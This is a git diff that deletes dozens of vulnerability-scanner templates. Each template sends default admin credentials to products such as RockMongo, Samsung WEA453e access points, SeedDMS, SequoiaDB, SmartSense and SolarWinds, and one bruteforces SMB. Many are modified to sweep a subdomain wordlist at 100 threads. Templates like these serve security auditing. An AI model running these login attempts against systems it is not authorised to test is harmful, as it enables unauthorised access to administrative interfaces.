- Content-Type: application/x-www-form-urlencoded
- Referer: https://{{Subdomains}}/index.php?action=login.index
-
- more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Location: /index.php?action=admin.index&host=0"
- - "Set-Cookie: ROCK_LANG="
- part: header
- - type: status
- status:
- - 302
diff --git a/tmp/default/rockmongo-default-credentials.yaml b/tmp/default/rockmongo-default-credentials.yaml
deleted file mode 100644
index 2fe8f6cff5..0000000000
--- a/tmp/default/rockmongo-default-credentials.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: rockmongo-default-credentials
-
-info:
- name: Rockmongo Default Credentials
- author: pikpikcu
- severity: high
- tags: rockmongo,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /index.php?action=login.index HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Content-Type: application/x-www-form-urlencoded
- Referer: https://{{Subdomains}}/index.php?action=login.index
-
- more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "Location: /index.php?action=admin.index&host=0"
- - "Set-Cookie: ROCK_LANG="
- part: header
-
- - type: status
- status:
- - 302
diff --git a/tmp/default/rockmongo-default-login-9898.yaml b/tmp/default/rockmongo-default-login-9898.yaml
deleted file mode 100644
index e118a865ae..0000000000
--- a/tmp/default/rockmongo-default-login-9898.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: rockmongo-default-login
-info:
- name: Rockmongo Default Login
- author: pikpikcu
- severity: high
- tags: rockmongo,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /index.php?action=login.index HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{Scheme}}://{{Subdomains}}/index.php?action=login.index
-
- more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Location: /index.php?action=admin.index&host=0"
- - "Set-Cookie: ROCK_LANG="
- part: header
- - type: status
- status:
- - 302
diff --git a/tmp/default/rockmongo-default-login.yaml b/tmp/default/rockmongo-default-login.yaml
deleted file mode 100644
index 2511a9fca9..0000000000
--- a/tmp/default/rockmongo-default-login.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: rockmongo-default-login
-
-info:
- name: Rockmongo Default Login
- author: pikpikcu
- severity: high
- tags: rockmongo,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /index.php?action=login.index HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{Scheme}}://{{Subdomains}}/index.php?action=login.index
-
- more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "Location: /index.php?action=admin.index&host=0"
- - "Set-Cookie: ROCK_LANG="
- part: header
-
- - type: status
- status:
- - 302
diff --git a/tmp/default/rockmongo-default-password.yaml b/tmp/default/rockmongo-default-password.yaml
deleted file mode 100644
index ef5fcb6b2f..0000000000
--- a/tmp/default/rockmongo-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: rockmongo-default-password
-
-info:
- name: Rockmongo Default Password
- author: B1anda0(https://github.com/B1anda0)
- severity: high
- verified: true
- description: app="RockMongo"
-
-rules:
- r0:
- request:
- method: POST
- path: /index.php?action=login.index&host=0
- body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
- expression: response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
-expression: r0()
-
diff --git a/tmp/default/rockmongo-default-password.yml b/tmp/default/rockmongo-default-password.yml
deleted file mode 100644
index cb7d3f6568..0000000000
--- a/tmp/default/rockmongo-default-password.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-rockmongo-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /index.php?action=login.index&host=0
- body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
- follow_redirects: false
- expression: response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://www.runoob.com/mongodb/working-with-rockmongo.html
diff --git a/tmp/default/rseenet-default-login.yaml b/tmp/default/rseenet-default-login.yaml
deleted file mode 100644
index 73dad842a6..0000000000
--- a/tmp/default/rseenet-default-login.yaml
+++ /dev/null
@@ -1,46 +0,0 @@
-id: rseenet-default-login
-
-info:
- name: Advantech R-SeeNet Default Login
- author: princechaddha
- severity: high
- description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers.
- reference:
- - https://icr.advantech.cz/products/software/r-seenet
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- tags: rseenet,default-login
-
-http:
- - raw:
- - |
- POST /index.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- page=login_change&oper=0&username={{user}}&password={{pass}}&submit=Login
-
- attack: pitchfork
- payloads:
- user:
- - admin
- pass:
- - conel
-
- matchers-condition: and
- matchers:
- - type: regex
- part: body
- regex:
- - 'R-SeeNet (.*)'
-
- - type: word
- part: body
- words:
- - "User is succesfully logged."
-
-# digest: 4a0a00473045022100efb5edcd4a4e48d7b54a630c30b681e36f9607dc91f478ef28453df486b505dc022032a21bafe86d3ddfedf9bf40db7657ab9171805b4528ac3d8f9847acd4c5964f:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/rseenet-default-password.yaml b/tmp/default/rseenet-default-password.yaml
deleted file mode 100644
index bbb229a16f..0000000000
--- a/tmp/default/rseenet-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: rseenet-default-password
-
-info:
- name: Advantech R-SeeNet Default Login
- author: princechaddha
- severity: high
- verified: true
- description: fofa "R-SeeNet"
-
-rules:
- r0:
- request:
- method: POST
- path: /index.php
- body: |
- page=login_change&oper=0&username=admin&password=conel&submit=Login
- expression: response.status == 200 && response.body.bcontains(b'User is succesfully logged.') && response.body.bcontains(b'R-SeeNet')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/samsung-wea453e-default-pwd.yaml b/tmp/default/samsung-wea453e-default-pwd.yaml
deleted file mode 100644
index f84df0bdf5..0000000000
--- a/tmp/default/samsung-wea453e-default-pwd.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: samsung-wea453e-default-pwd
-
-info:
- name: Samsung Wea453e Default Password
- author: sharecast
- severity: high
-
-rules:
- r0:
- request:
- method: POST
- path: /main.ehp
- body: |
- httpd;General;lang=en&login_id=root&login_pw=sweap12~
- expression: response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp"))
-expression: r0()
diff --git a/tmp/default/samsung-wea453e-default-pwd.yml b/tmp/default/samsung-wea453e-default-pwd.yml
deleted file mode 100644
index fd89d0c5ad..0000000000
--- a/tmp/default/samsung-wea453e-default-pwd.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-name: poc-yaml-samsung-wea453e-default-pwd
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /main.ehp
- body: |
- httpd;General;lang=en&login_id=root&login_pw=sweap12~
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp"))
-expression: r0()
-detail:
- author: sharecast
- links:
- - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
diff --git a/tmp/default/samsung-wlan-ap-default-credentials-9996.yaml b/tmp/default/samsung-wlan-ap-default-credentials-9996.yaml
deleted file mode 100644
index 9c8fe367e4..0000000000
--- a/tmp/default/samsung-wlan-ap-default-credentials-9996.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: samsung-wlan-ap-default-credentials
-info:
- name: Samsung Wlan AP (WEA453e) Default Credentials
- author: pikpikcu
- severity: high
- reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
- tags: samsung,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /main.ehp HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-
- httpd;General;lang=en&login_id=root&login_pw=sweap12~
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "document.formParent2.changepasswd1.value"
- - "passwd_change.ehp"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/samsung-wlan-ap-default-credentials.yaml b/tmp/default/samsung-wlan-ap-default-credentials.yaml
deleted file mode 100644
index c41f89e63d..0000000000
--- a/tmp/default/samsung-wlan-ap-default-credentials.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: samsung-wlan-ap-default-credentials
-
-info:
- name: Samsung Wlan AP (WEA453e) Default Credentials
- author: pikpikcu
- severity: high
- reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
- tags: samsung,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /main.ehp HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-
- httpd;General;lang=en&login_id=root&login_pw=sweap12~
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "document.formParent2.changepasswd1.value"
- - "passwd_change.ehp"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/samsung-wlan-default-login-10016.yaml b/tmp/default/samsung-wlan-default-login-10016.yaml
deleted file mode 100644
index ea72cf9015..0000000000
--- a/tmp/default/samsung-wlan-default-login-10016.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: samsung-wlan-default-login
-info:
- name: Samsung Wlan AP (WEA453e) Default Login
- author: pikpikcu
- severity: high
- reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
- tags: samsung,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /main.ehp HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- httpd;General;lang=en&login_id=root&login_pw=sweap12~
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "document.formParent2.changepasswd1.value"
- - "passwd_change.ehp"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/samsung-wlan-default-login.yaml b/tmp/default/samsung-wlan-default-login.yaml
deleted file mode 100644
index b7baeff1b7..0000000000
--- a/tmp/default/samsung-wlan-default-login.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: samsung-wlan-default-login
-
-info:
- name: Samsung Wlan AP (WEA453e) Default Login
- author: pikpikcu
- severity: high
- reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
- tags: samsung,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /main.ehp HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- httpd;General;lang=en&login_id=root&login_pw=sweap12~
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "document.formParent2.changepasswd1.value"
- - "passwd_change.ehp"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/secnet-ac-default-password.yaml b/tmp/default/secnet-ac-default-password.yaml
deleted file mode 100644
index e78d3af30e..0000000000
--- a/tmp/default/secnet-ac-default-password.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: poc-yaml-secnet-ac-default-password
-manual: true
-transport: http
-rules:
- uc1:
- request:
- cache: true
- method: GET
- path: /login.html
- expression: response.status == 200 && response.body.bcontains(b"安网科技-智能路由系统")
- uc2:
- request:
- cache: true
- method: POST
- path: /login.cgi
- body:
- user=admin&password=admin
- expression: response.status == 200 && response.headers["Set-Cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
-expression: uc1() && uc2()
-detail:
- author: iak3ec(https://github.com/nu0l)
- links:
- - https://bbs.secnet.cn/post/t-30
diff --git a/tmp/default/secnet-ac-default-password.yml b/tmp/default/secnet-ac-default-password.yml
deleted file mode 100644
index 7be3d3ba0f..0000000000
--- a/tmp/default/secnet-ac-default-password.yml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: poc-yaml-secnet-ac-default-password
-manual: true
-transport: http
-rules:
- uc1:
- request:
- cache: true
- method: GET
- path: /login.html
- expression: response.status == 200 && response.body.bcontains(b"安网科技-智能路由系统")
- uc2:
- request:
- cache: true
- method: POST
- path: /login.cgi
- body:
- user=admin&password=admin
- expression: response.status == 200 && response.headers["Set-Cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
-expression: uc1() && uc2()
-detail:
- author: iak3ec(https://github.com/nu0l)
- links:
- - https://bbs.secnet.cn/post/t-30
diff --git a/tmp/default/seeddms-default-login-10126.yaml b/tmp/default/seeddms-default-login-10126.yaml
deleted file mode 100644
index 543a80d058..0000000000
--- a/tmp/default/seeddms-default-login-10126.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: seeddms-default-login
-info:
- name: SeedDMS Default Credential
- author: alifathi-h1
- severity: high
- reference: https://www.redhat.com/sysadmin/install-seeddms
- tags: default-login,seeddms
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /op/op.Login.php HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- login=admin&pwd=admin&lang=
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'Location: /out/out.ViewFolder.php'
- - type: status
- status:
- - 302
diff --git a/tmp/default/seeddms-default-login.yaml b/tmp/default/seeddms-default-login.yaml
deleted file mode 100644
index 4b68641e37..0000000000
--- a/tmp/default/seeddms-default-login.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: seeddms-default-login
-
-info:
- name: SeedDMS Default Credential
- author: alifathi-h1
- severity: high
- reference: https://www.redhat.com/sysadmin/install-seeddms
- tags: default-login,seeddms
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /op/op.Login.php HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- login=admin&pwd=admin&lang=
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'Location: /out/out.ViewFolder.php'
-
- - type: status
- status:
- - 302
\ No newline at end of file
diff --git a/tmp/default/seeddms-default-password.yaml b/tmp/default/seeddms-default-password.yaml
deleted file mode 100644
index c05a91d4f5..0000000000
--- a/tmp/default/seeddms-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: seeddms-default-password
-
-info:
- name: SeedDMS Default Credential
- author: alifathi-h1
- severity: high
- verified: true
- description: app="SeedDMS:-Sign-in"
-
-rules:
- r0:
- request:
- method: POST
- path: /op/op.Login.php
- body: login=admin&pwd=admin&lang=
- expression: response.status == 302 && response.headers["location"].contains("/out/out.ViewFolder.php")
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/seeyon-a8-management-monitor-default-password.yaml b/tmp/default/seeyon-a8-management-monitor-default-password.yaml
deleted file mode 100644
index de450a43c7..0000000000
--- a/tmp/default/seeyon-a8-management-monitor-default-password.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: seeyon-a8-management-monitor-default-password
-
-info:
- name: A8 Management Monitor Default Password
- author: zan8in
- severity: medium
- verified: true
- description: |
- A8 Management Monitor
- 1.登录页面:/seeyon/management/index.jsp
- 2.默认密码:WLCCYBD@SEEYON
- fofa:app="致远互联-OA"
-
-rules:
- r0:
- request:
- method: GET
- path: /seeyon/management/index.jsp
- expression: response.status == 200 && response.body.ibcontains(b'A8 Management Monitor')
- r1:
- request:
- method: POST
- path: /seeyon/management/index.jsp
- body: password=WLCCYBD@SEEYON
- expression: response.status == 302 && response.raw_header.ibcontains(b'/seeyon/management/status.jsp')
-expression: r0() && r1()
\ No newline at end of file
diff --git a/tmp/default/sequoiadb-default-login.yaml b/tmp/default/sequoiadb-default-login.yaml
deleted file mode 100644
index fdb29a0f16..0000000000
--- a/tmp/default/sequoiadb-default-login.yaml
+++ /dev/null
@@ -1,53 +0,0 @@
-id: sequoiadb-default-login
-
-info:
- name: SequoiaDB Default Login
- author: dhiyaneshDk
- severity: high
- description: SequoiaDB default admin credentials were discovered.
- reference:
- - https://www.sequoiadb.com/en/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- tags: default-login,sequoiadb
-
-http:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
- SdbLanguage: en
-
- cmd=login&user={{username}}&passwd={{md5(password)}}
-
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: dsl
- dsl:
- - contains(tolower(header), 'sdbsessionid')
-
- - type: word
- part: body
- words:
- - '{ "errno": 0 }'
-
-# digest: 4a0a00473045022100cd781761dd66c2f6691700b7614620245b4c34a2b313a63253cb1873299480c402207148beb226244443676ed42bf1405429e68b97ffd6875e321c3dc6f062b8fbfd:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/showdoc-default-login-10220.yaml b/tmp/default/showdoc-default-login-10220.yaml
deleted file mode 100644
index 2215602617..0000000000
--- a/tmp/default/showdoc-default-login-10220.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: showdoc-default-login
-info:
- name: Showdoc Default Login
- author: pikpikcu
- severity: medium
- reference:
- - https://blog.star7th.com/2016/05/2007.html
- tags: showdoc,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /server/index.php?s=/api/user/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- username=showdoc&password=123456&v_code=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"username":"showdoc"'
- - '"user_token":'
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/showdoc-default-login.yaml b/tmp/default/showdoc-default-login.yaml
deleted file mode 100644
index ec9cfe95b3..0000000000
--- a/tmp/default/showdoc-default-login.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: showdoc-default-login
-
-info:
- name: Showdoc Default Login
- author: pikpikcu
- severity: medium
- reference:
- - https://blog.star7th.com/2016/05/2007.html
- tags: showdoc,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /server/index.php?s=/api/user/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- username=showdoc&password=123456&v_code=
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - '"username":"showdoc"'
- - '"user_token":'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/showdoc-default-password-10223.yaml b/tmp/default/showdoc-default-password-10223.yaml
deleted file mode 100644
index b0653af6f2..0000000000
--- a/tmp/default/showdoc-default-password-10223.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-showdoc-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /server/index.php?s=/api/user/login
- body: username=showdoc&password=123456
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token")
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://blog.star7th.com/2016/05/2007.html
diff --git a/tmp/default/showdoc-default-password.yaml b/tmp/default/showdoc-default-password.yaml
deleted file mode 100644
index 13ae3cb17a..0000000000
--- a/tmp/default/showdoc-default-password.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: showdoc-default-password
-
-info:
- name: Showdoc Default Password
- author: pikpikcu
- severity: medium
- reference: |
- - https://blog.star7th.com/2016/05/2007.html
- tags: showdoc,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /server/index.php?s=/api/user/login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Content-Type: application/x-www-form-urlencoded;charset=UTF-8
-
- username=showdoc&password=123456&v_code=
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - '"username":"showdoc"'
- - '"user_token":'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/sitecore-default-page.yaml b/tmp/default/sitecore-default-page.yaml
deleted file mode 100644
index 48c8c15775..0000000000
--- a/tmp/default/sitecore-default-page.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: sitecore-default-page
-info:
- name: Sitecore Default Page
- author: DhiyaneshDK
- severity: info
- metadata:
- shodan-query: http.title:"Welcome to Sitecore"
- tags: tech,sitecore
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Welcome to Sitecore"
- - type: status
- status:
- - 200
diff --git a/tmp/default/smartsense-default-login-10328.yaml b/tmp/default/smartsense-default-login-10328.yaml
deleted file mode 100644
index 97577393c2..0000000000
--- a/tmp/default/smartsense-default-login-10328.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: smartsense-default-login
-
-info:
- name: HortonWorks SmartSense Default Login
- author: Techryptic (@Tech)
- severity: high
- description: HortonWorks SmartSense default admin login information was detected.
- reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
- tags: hortonworks,smartsense,default-login
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
-
-requests:
- - raw:
- - |
- GET /apt/v1/context HTTP/1.1
- Host: {{Hostname}}
- Authorization: Basic {{base64(username + ':' + password)}}
-
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: SUPPORTSESSIONID"
- part: header
-
- - type: word
- words:
- - "smartsenseId"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/10
diff --git a/tmp/default/smartsense-default-login-10329.yaml b/tmp/default/smartsense-default-login-10329.yaml
deleted file mode 100644
index c2ab9dccb8..0000000000
--- a/tmp/default/smartsense-default-login-10329.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: smartsense-default-login
-info:
- name: HortonWorks SmartSense Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on HortonWorks SmartSense application.
- reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
- tags: hortonworks,smartsense,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /apt/v1/context HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: SUPPORTSESSIONID"
- part: header
- - type: word
- words:
- - "smartsenseId"
- - type: status
- status:
- - 200
diff --git a/tmp/default/smartsense-default-login.yaml b/tmp/default/smartsense-default-login.yaml
deleted file mode 100644
index 05cd306277..0000000000
--- a/tmp/default/smartsense-default-login.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: smartsense-default-login
-
-info:
- name: HortonWorks SmartSense Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on HortonWorks SmartSense application.
- reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
- tags: hortonworks,smartsense,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /apt/v1/context HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: SUPPORTSESSIONID"
- part: header
-
- - type: word
- words:
- - "smartsenseId"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/smb-default-creds.yaml b/tmp/default/smb-default-creds.yaml
deleted file mode 100644
index c780d674b0..0000000000
--- a/tmp/default/smb-default-creds.yaml
+++ /dev/null
@@ -1,48 +0,0 @@
-id: smb-default-creds
-
-info:
- name: SMB Default Credential - Bruteforce
- author: pussycat0x
- severity: high
- description: |
- Attempts to guess username/password combinations over SMB.
- reference:
- - https://nmap.org/nsedoc/scripts/smb-brute.html
- metadata:
- verified: true
- max-request: 9
- shodan-query: "port:445"
- tags: js,network,smb,enum,default,bruteforce
-
-javascript:
- - code: |
- var m = require("nuclei/smb");
- var c = new m.SMBClient();
- var response = c.ListShares(Host, Port, User, Pass);
- response;
-
- args:
- Host: "{{Host}}"
- Port: "445"
- User: "{{usernames}}"
- Pass: "{{passwords}}"
-
- attack: clusterbomb
- payloads:
- usernames:
- - 'admin'
- - 'administrator'
- - 'guest'
- passwords:
- - 'admin'
- - 'password'
- - 'guest'
-
- stop-at-first-match: true
- matchers:
- - type: dsl
- dsl:
- - 'response != "[]"'
- - 'success == true'
- condition: and
-# digest: 4a0a00473045022100e4e4c6b26aee87ee4e9049bc95f669a4f5ea3dad6588ce20344199115d43052e0220243f2d99ab65b5b97c603640b1415e81a9b424a03025e820492c47e88a2de49f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/default/solarwinds-default-admin-1.yaml b/tmp/default/solarwinds-default-admin-1.yaml
deleted file mode 100644
index e7fd3c3388..0000000000
--- a/tmp/default/solarwinds-default-admin-1.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: solarwinds-default-admin 2
-
-info:
- name: SolarWinds Orion Default Credentials
- author: dwisiswant0
- severity: high
- tags: solarwinds,default-login
-
- # Optional:
- # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
- # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
-
- # References:
- # - https://github.com/solarwinds/OrionSDK/wiki/REST
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Authorization: Basic YWRtaW46
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Content-Type: application/json"
- part: header
- - type: regex
- regex:
- - "(totalRow|result|swi)s(:\\/\\/)?"
- - "(Orion\\.|Poller(ID)?)s?"
- condition: and
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/default/spectracom-default-login-10404.yaml b/tmp/default/spectracom-default-login-10404.yaml
deleted file mode 100644
index 21c0234058..0000000000
--- a/tmp/default/spectracom-default-login-10404.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: spectracom-default-login
-info:
- name: Spectracom Default Login
- author: madrobot
- severity: medium
- tags: spectracom,default-login
-requests:
- - payloads:
